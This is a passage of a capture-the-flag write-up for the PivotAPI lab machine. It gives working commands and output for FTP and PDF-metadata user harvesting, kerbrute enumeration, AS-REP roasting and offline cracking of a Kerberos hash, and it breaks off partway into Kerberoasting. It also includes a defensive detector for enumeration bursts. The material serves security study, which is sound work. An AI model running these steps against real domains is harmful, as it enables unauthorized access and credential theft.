PivotAPI
"Red Team Notes" study record
Machine overview
Pivotapi is an insane machine that involves user enumeration through the metadata of PDFs which are downloaded from an FTP file share server. Since the user does not have Kerberos pre-authentication enabled it is possible to request a TGT for him, which can be cracked with Hashcat. With the provided credentials an SMB enumeration exposes an executable which, when reverse engineered, reveals credentials to authenticate to MSSQL. After gaining access to the system it is possible to locate a KeePass database on the target, leading to further misconfiguration abuse through Active Directory, which leads to obtaining the Administrator's password through LAPS and thus getting execution on the target through `psexec` as user Administrator.
Difficulty
Insane
Information gathering
Detailed TCP scan:
sudo nmap -sT -sV -sC -O -p$tcports $ip1 -oA nmapscan/tcpdetails
# Nmap 7.94SVN scan initiated Mon Jan 15 15:24:33 2024 as: nmap -sT -sV -sC -O -p21,22,53,88,135,139,389,445,464,593,636,1433,3268,3269,9389,49667,49677,49678,49710,49784 -oA nmapscan/tcpdetails 10.129.228.115
Nmap scan report for 10.129.228.115 (10.129.228.115)
Host is up (0.38s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21 02:06PM 103106 10.1.1.414.6453.pdf
| 02-19-21 02:06PM 656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21 11:55AM 1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21 02:06PM 1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20 12:18PM 219091 notes1.pdf
| 08-08-20 12:34PM 279445 notes2.pdf
| 08-08-20 12:41PM 105 README.txt
|_02-19-21 02:06PM 1301120 RHUL-MA-2009-06.pdf
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
| 256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_ 256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-15 08:24:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.129.228.115:1433:
| Target_Name: LICORDEBELLOTA
| NetBIOS_Domain_Name: LICORDEBELLOTA
| NetBIOS_Computer_Name: PIVOTAPI
| DNS_Domain_Name: LicorDeBellota.htb
| DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
| DNS_Tree_Name: LicorDeBellota.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-01-15T08:22:52
|_Not valid after: 2054-01-15T08:22:52
| ms-sql-info:
| 10.129.228.115:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-01-15T08:26:05+00:00; +59m39s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49710/tcp open msrpc Microsoft Windows RPC
49784/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 59m38s, deviation: 0s, median: 59m38s
| smb2-time:
| date: 2024-01-15T08:25:25
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 15 15:26:39 2024 -- 1 IP address (1 host up) scanned in 126.25 seconds
The nmap vulnerability-script scan and the UDP scan showed nothing of value, so they are skipped.
Scan result analysis
Note the DNS_Computer_Name: PivotAPI.LicorDeBellota.htb and its IP 10.129.228.115. Combined with the set of exposed ports, which all fit, this is very likely a domain controller, so write the name into the hosts file for later access.
From an attack-surface perspective, experience says to prioritise ports 21, 445, 88 and 3268.
Exploitation
Download files via anonymous FTP login
You can connect with the ftp command and download from there, but downloads are prone to problems, require various settings, and above all must be done in binary mode. wget is used here instead.
wget -m ftp://anonymous:随机密码@LicorDeBellota.htb
Initial file analysis, digging for sensitive information
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# ls
10.1.1.414.6453.pdf BHUSA09-McDonald-WindowsHeap-PAPER.pdf notes1.pdf README.txt
28475-linux-stack-based-buffer-overflows.pdf ExploitingSoftware-Ch07.pdf notes2.pdf RHUL-MA-2009-06.pdf
There is only one txt file; the rest are PDFs. Apart from the txt, don't open the others casually yet. Check the txt content:
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat README.txt
VERY IMPORTANT!!
Don't forget to change the download mode to binary so that the files are not corrupted.
Check the metadata of the remaining files first, to quickly extract potentially sensitive information:
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# exiftool *.pdf |less
`less` is used here so you can scroll freely with the mouse while reading.
The Creator and Author fields look the most promising, so filter them out with text-processing tools:
exiftool *.pdf | grep -iE creator\|author | awk -F ":" '{print $2}' | grep -v -i microsoft | grep -vE '[0-9]' | uniq | tail -n 4 | sort | tee pdf_authors
Output:
┌──(root㉿hunter)-[/home/…/htb/PivotAPI/ftp/licordebellota.htb]
└─# cat pdf_authors
alex
byron gronseth
Kaorz
saif
Then skim each PDF. None yields credentials or similar sensitive data for now: most are reference material and papers on stack and heap buffer overflows, and the introductions name the authors' universities, but nothing is usable yet. Set them aside and only revisit them carefully if we run out of ideas.
Attempt to enumerate SMB shares
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# crackmapexec smb $ip1
SMB 10.129.228.115 445 PIVOTAPI [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbmap -H $ip1
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights. on line 970
Traceback (most recent call last):
File "/usr/bin/smbmap", line 33, in <module>
sys.exit(load_entry_point('smbmap==1.9.2', 'console_scripts', 'smbmap')())
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/smbmap/smbmap.py", line 1435, in main
host = [ host for host in share_drives_list.keys() ][0]
^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'bool' object has no attribute 'keys'
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# smbclient -L //$ip1 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.228.115 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
All of the above attempts to list SMB shares without credentials failed.
Attempt to connect to the RPC service
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U '' -N $ip1
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
This shows RPC cannot be used without any credentials.
Attempt username enumeration
Since this is a domain environment, try kerbrute, a user-enumeration tool based on the Kerberos protocol. Kerberos is a network authentication protocol that allows secure authentication between nodes on a network; in a Kerberos environment, users and services are authenticated with keys rather than passwords. kerbrute's user enumeration relies on a Kerberos property: when a non-existent user attempts to authenticate, Kerberos returns an error saying the client identity is unknown, whereas if the username exists but the password is wrong it returns a different error. For each username in the supplied list, the tool sends an authentication request with a wrong password and uses the response to tell whether the name exists. This is fast and stealthy: it only sends authentication requests rather than actually authenticating, so it does not trigger the account lockout policy.
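The enumeration behaviour described above is visible from the defender's side as a burst of TGT requests (Windows Security event 4768) from one client address that fail with result code 0x6 (client not found in the Kerberos database), each for a different account name. The following is an added example, not part of the original notes, that flags such bursts over already-parsed 4768 records. The records are constructed here (the names, timestamps and addresses are made up), and the field names TimeCreated, TargetUserName, IpAddress and Status follow the 4768 event schema; a real pipeline would fill them from the evtx or a SIEM export.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of parsed Windows Security event 4768 (Kerberos TGT request) records.
# 12 unknown-principal failures (0x6) from one address within seconds, then a few
# ordinary events from a second address: one typo (0x6), one bad password (0x18), one success (0x0).
SAMPLE_4768_EVENTS = [
    {"TimeCreated": f"2024-01-27T17:28:{5 + i:02d}", "TargetUserName": f"guess{i:02d}",
     "IpAddress": "::ffff:10.10.14.5", "Status": "0x6"}
    for i in range(12)
] + [
    {"TimeCreated": "2024-01-27T17:30:00", "TargetUserName": "jarri",
     "IpAddress": "::ffff:10.10.14.9", "Status": "0x6"},
    {"TimeCreated": "2024-01-27T17:30:20", "TargetUserName": "jari",
     "IpAddress": "::ffff:10.10.14.9", "Status": "0x18"},
    {"TimeCreated": "2024-01-27T17:31:00", "TargetUserName": "kaorz",
     "IpAddress": "::ffff:10.10.14.9", "Status": "0x0"},
]

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"  # result code logged when the requested principal does not exist


def client_ip(addr: str) -> str:
    """4768 logs IPv4 clients as IPv4-mapped IPv6 addresses; strip the ::ffff: prefix."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def unknown_principal_bursts(events, window_seconds: int = 60, threshold: int = 10) -> dict:
    """Return {client_ip: max_distinct_unknown_names_in_any_window} for clients whose
    0x6 failures name at least `threshold` distinct accounts within `window_seconds`."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"].lower() != KDC_ERR_C_PRINCIPAL_UNKNOWN:
            continue
        by_ip[client_ip(e["IpAddress"])].append(
            (datetime.fromisoformat(e["TimeCreated"]), e["TargetUserName"].lower())
        )
    window = timedelta(seconds=window_seconds)
    findings = {}
    for ip, attempts in by_ip.items():
        attempts.sort()
        best = 0
        # For each failure, count distinct names in the window ending at that failure.
        for i, (t_end, _) in enumerate(attempts):
            names = {name for t, name in attempts[: i + 1] if t_end - t <= window}
            best = max(best, len(names))
        if best >= threshold:
            findings[ip] = best
    return findings


if __name__ == "__main__":
    for ip, count in unknown_principal_bursts(SAMPLE_4768_EVENTS).items():
        print(f"possible Kerberos user enumeration from {ip}: {count} unknown principals in one window")
```

Counting distinct names rather than raw failures keeps a single user repeatedly mistyping their own name below the threshold, while a wordlist-driven tool crosses it within seconds regardless of thread count.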
If you are on an ARM machine (e.g. an Apple-silicon computer) you need to compile it yourself. Note: in the cloned GitHub repository, edit the Makefile and add arm64 to the ARCHS= line at the top, then run make linux. If it complains about a missing module, install it and rerun the command.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# kerbrute userenum -d LicorDebellota.htb --dc $ip1 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -t 1000
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/27/24 - Ronnie Flathers @ropnop
2024/01/27 17:28:05 > Using KDC(s):
2024/01/27 17:28:05 > 10.129.228.115:88
2024/01/27 17:28:31 > [+] VALID USERNAME: jari@LicorDebellota.htb
2024/01/27 17:31:31 > [+] VALID USERNAME: administrador@LicorDebellota.htb
2024/01/27 17:37:38 > [+] VALID USERNAME: sshd@LicorDebellota.htb
2024/01/27 17:52:40 > [+] VALID USERNAME: lothbrok@LicorDebellota.htb
2024/01/27 18:21:43 > Done! Tested 8295455 usernames (4 valid) in 3218.585 seconds
-t sets the thread count; balance it against your own performance and the remote server's defences, since too high a rate is easily detected and blocked.
Add the newly enumerated usernames to pdf_authors from the initial information gathering:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cp pdf_authors users_list
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# nt users_list
# note: nt here is a command I renamed myself
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# cat users_list
alex
byron gronseth
byron
gronseth
Kaorz
saif
jari
administrador
sshd
lothbrok
Because the second username is a combination, split it into separate usernames to widen the possibilities.
Attempt AS-REP roasting
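The two steps above, filtering Creator/Author values out of exiftool output and splitting combined names into separate usernames, are done below in one added Python example that is not part of the original notes. The exiftool output is a constructed sample modelled on the fields the notes found (the file names come from the FTP listing, the layout and the software-name values are made up), and the extra joined forms such as first.last are a generalisation beyond the notes, which only split the name into its parts.

```python
import re

# Constructed sample of `exiftool *.pdf` output; only the Author values mirror the notes.
SAMPLE_EXIFTOOL_OUTPUT = """\
======== 10.1.1.414.6453.pdf
File Name                       : 10.1.1.414.6453.pdf
Creator                         : TeX output 2009.03.30:1159
Author                          : Kaorz
======== notes1.pdf
Creator                         : Microsoft® Word 2016
Author                          : saif
======== notes2.pdf
Creator                         : Microsoft® Word 2016
Author                          : byron gronseth
======== RHUL-MA-2009-06.pdf
Creator                         : pdfTeX-1.40.10
Author                          : alex
Producer                        : pdfTeX-1.40.10
    4 image files read
"""

FIELD_RE = re.compile(r"^(Creator|Author)\s*:\s*(.+?)\s*$", re.IGNORECASE)


def extract_author_names(exiftool_output: str) -> list:
    """Keep Creator/Author values that look like people: no 'microsoft', no digits
    (software names and version strings carry digits), de-duplicated in order of appearance."""
    names = []
    for raw in exiftool_output.splitlines():
        m = FIELD_RE.match(raw.strip())
        if not m:
            continue
        value = m.group(2)
        if "microsoft" in value.lower() or re.search(r"\d", value):
            continue
        if value not in names:
            names.append(value)
    return names


def username_candidates(name: str) -> list:
    """Turn a display name into candidate account names. Single tokens pass through;
    multi-word names yield each part plus common first/last combinations."""
    parts = name.lower().split()
    if len(parts) == 1:
        return parts
    first, last = parts[0], parts[-1]
    forms = parts + [f"{first}.{last}", f"{first}{last}", f"{first[0]}{last}", f"{first[0]}.{last}"]
    out = []
    for form in forms:
        if form not in out:
            out.append(form)
    return out


def build_user_list(exiftool_output: str) -> list:
    """Full pipeline: metadata -> names -> de-duplicated username candidates."""
    users = []
    for name in extract_author_names(exiftool_output):
        for user in username_candidates(name):
            if user not in users:
                users.append(user)
    return users


if __name__ == "__main__":
    print("\n".join(build_user_list(SAMPLE_EXIFTOOL_OUTPUT)))
```

Unlike the shell pipeline, which relies on `uniq` and `tail -n 4` to trim the list, this version de-duplicates properly and so does not depend on the exact order or number of files.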
In domain penetration, whenever a set of potential usernames has been collected, think of this technique: check whether some user happens not to require domain pre-authentication (i.e. the UF_DONT_REQUIRE_PREAUTH flag is set to true). That allows the Kerberos authentication process to start and, although we cannot authenticate successfully, it hands us the user's credential hash (the encrypted TGT material), which we can then try to crack. PREAUTH is pre-authentication and AS is the Authentication Service. In Kerberos, if pre-authentication is enabled, the user must first prove knowledge of the correct password before the AS returns the TGT, which adds security. If pre-authentication is disabled, an attacker can request a TGT without knowing the password and then attempt to crack the encrypted TGT offline.
This attack uses the GetNPUsers Python script from the impacket framework. Locate it with the locate command; note that locate must first be installed with apt and its database updated:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# updatedb
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# locate -i getnp
/pentest/impacket/build/scripts-3.11/GetNPUsers.py
/pentest/impacket/examples/GetNPUsers.py
/usr/local/bin/GetNPUsers.py
/usr/local/bin/__pycache__/GetNPUsers.cpython-311.pyc
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetNPUsers.py
/usr/share/doc/python3-impacket/examples/GetNPUsers.py
# copy this last path and create a symlink:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ln -s /usr/share/doc/python3-impacket/examples/GetNPUsers.py /usr/bin/GetNPUsers.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -h
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
usage: GetNPUsers.py [-h] [-request] [-outputfile OUTPUTFILE] [-format {hashcat,john}] [-usersfile USERSFILE] [-ts] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]
[-dc-ip ip address] [-dc-host hostname]
target
Queries target domain for users with 'Do not require Kerberos preauthentication' set and export their TGTs for cracking
positional arguments:
target [[domain/]username[:password]]
options:
-h, --help show this help message and exit
-request Requests TGT for users and output them in JtR/hashcat format (default False)
-outputfile OUTPUTFILE
Output filename to write ciphers in JtR/hashcat format
-format {hashcat,john}
format to save the AS_REQ of users without pre-authentication. Default is hashcat
-usersfile USERSFILE File with user per line to test
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
-dc-ip ip address IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
-dc-host hostname Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used
Run the script:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# GetNPUsers.py -no-pass -dc-ip $ip1 LicorDebellota.htb/ -usersfile users_list
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User jari doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrador doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sshd doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lothbrok doesn't have UF_DONT_REQUIRE_PREAUTH set
Note the trailing / after the domain name. From the output we extracted the TGT hash of user Kaorz: $krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff773956ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3
This raises a question: why does Kerberos require pre-authentication for some users and not for others? There are several possible reasons:
(1) Compatibility. Early Kerberos clients may not support pre-authentication, so some accounts have the flag set to stay compatible with them;
(2) Simplifying authentication. In some cases a domain administrator wants to remove the pre-authentication step to simplify the process;
(3) Requirements of a specific application or service.
These factors are outside our control, and they leave a gap for attackers to exploit.
Save the extracted hash in its own file and crack it with john or hashcat:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt Kaorz_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155 ($krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB)
1g 0:00:00:03 DONE (2024-01-27 23:32) 0.2652g/s 2830Kp/s 2830Kc/s 2830KC/s S100195..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat --help | grep -i rep
--nonce-error-corrections | Num | The BF size range to replace AP's nonce last bytes | --nonce-error-corrections=16
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# hashcat -m 18200 Kaorz_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-haswell-13th Gen Intel(R) Core(TM) i5-13500HX, 30953/61970 MB (8192 MB allocatable), 20MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 5 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c83173954224fc3be923d$53204124cee878cdd9eb1c23c85d7ada60045c6f1a882b6dea2beaa657854ebe9526b0ab0e4d74485fbf5b475d33e9765577cd4db1ce664d42ff77395
6ead28aca3e550644441c89e8dc53cf4fa0b2936432f16ee56106b98ae24bb1fe13f13be5ce410492732b90bdd477f5457d74d2d6b21e5c41d8cfb41811dc7c3b55677d53c154339e0c8cc3b3689ed2e2fe6795891f491a5983a669e88b6f71d1
e0c4b2cb2279444ba987d952ebce794ed38f930a35258fc67a0791ede66b262a49f796d613ca30a64981a88a66eaa0e3d8b4557631a783054196e681c77e7fdfa4ef337db9a767cbedc47fae86b08087c9210b706e88b1f59cb3:Roper4155
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$Kaorz@LICORDEBELLOTA.HTB:386b4ef4696c...f59cb3
Time.Started.....: Sat Jan 27 23:34:25 2024 (2 secs)
Time.Estimated...: Sat Jan 27 23:34:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 5252.7 kH/s (2.30ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10670080/14344385 (74.39%)
Rejected.........: 0/10670080 (0.00%)
Restore.Point....: 10649600/14344385 (74.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: SEXY#2 -> RonaldoNathan
Hardware.Mon.#1..: Temp: 62c Util: 65%
Started: Sat Jan 27 23:34:09 2024
Stopped: Sat Jan 27 23:34:27 2024
Both methods recovered the password Roper4155; record the credential in the working pentest notes. Before cracking with hashcat, use the markers in the hash to look up the hashcat hash type, i.e. to determine -m; such markers are usually in the leading part of the hash. As seen above, john is quicker and simpler in this case because it detects the type automatically.
With a credential in hand, try whether it works against the matching services. SSH fails, indicating SSH is not set up for this user.
Attempt Kerberoasting
This attack is also specific to domain environments and targets accounts associated with a Service Principal Name (SPN), usually service accounts such as databases or web applications. Once an attacker holds a valid credential in the domain, not necessarily a high-privilege one (an ordinary user is normally enough), they can request service tickets for a given SPN. These tickets are encrypted with the service account's key, so the attacker can capture them and crack the service account's plaintext password offline. Like AS-REP roasting, this abuses a Kerberos design feature rather than a true vulnerability; the difference is that Kerberoasting requires a user credential, whereas AS-REP roasting does not.
Again we use a Python script from the impacket framework:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# locate -i spns
/pentest/impacket/build/scripts-3.11/GetUserSPNs.py
/pentest/impacket/examples/GetUserSPNs.py
/usr/local/bin/GetUserSPNs.py
/usr/local/bin/__pycache__/GetUserSPNs.cpython-311.pyc
/usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20231114.165227.4b56c18-py3.11.egg/EGG-INFO/scripts/GetUserSPNs.py
/usr/share/doc/metasploit-framework/modules/auxiliary/gather/get_user_spns.md
/usr/share/doc/python3-impacket/examples/GetUserSPNs.py
/usr/share/metasploit-framework/modules/auxiliary/gather/get_user_spns.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# ln -s /usr/share/doc/python3-impacket/examples/GetUserSPNs.py /usr/bin/GetUserSPNs.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb]
└─# GetUserSPNs.py -h
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
usage: GetUserSPNs.py [-h] [-target-domain TARGET_DOMAIN] [-stealth] [-usersfile USERSFILE] [-request] [-request-user username] [-save] [-outputfile OUTPUTFILE] [-ts] [-debug]
[-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-dc-host hostname]
target
Queries target domain for SPNs that are running under a user account
positional arguments:
target domain[/username[:password]]
options:
-h, --help show this help message and exit
-target-domain TARGET_DOMAIN
Domain to query/request if different than the domain of the user. Allows for Kerberoasting across trusts.
-stealth Removes the (servicePrincipalName=*) filter from the LDAP query for added stealth. May cause huge memory consumption / errors on large domains.
-usersfile USERSFILE File with user per line to test
-request Requests TGS for users and output them in JtR/hashcat format (default False)
-request-user username
Requests TGS for the SPN associated to the user specified (just the username, no domain needed)
-save Saves TGS requested to disk. Format is <username>.ccache. Auto selects -request
-outputfile OUTPUTFILE
Output filename to write ciphers in JtR/hashcat format
-ts Adds timestamp to every logging output
-debug Turn DEBUG output ON
authentication:
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones
specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
connection:
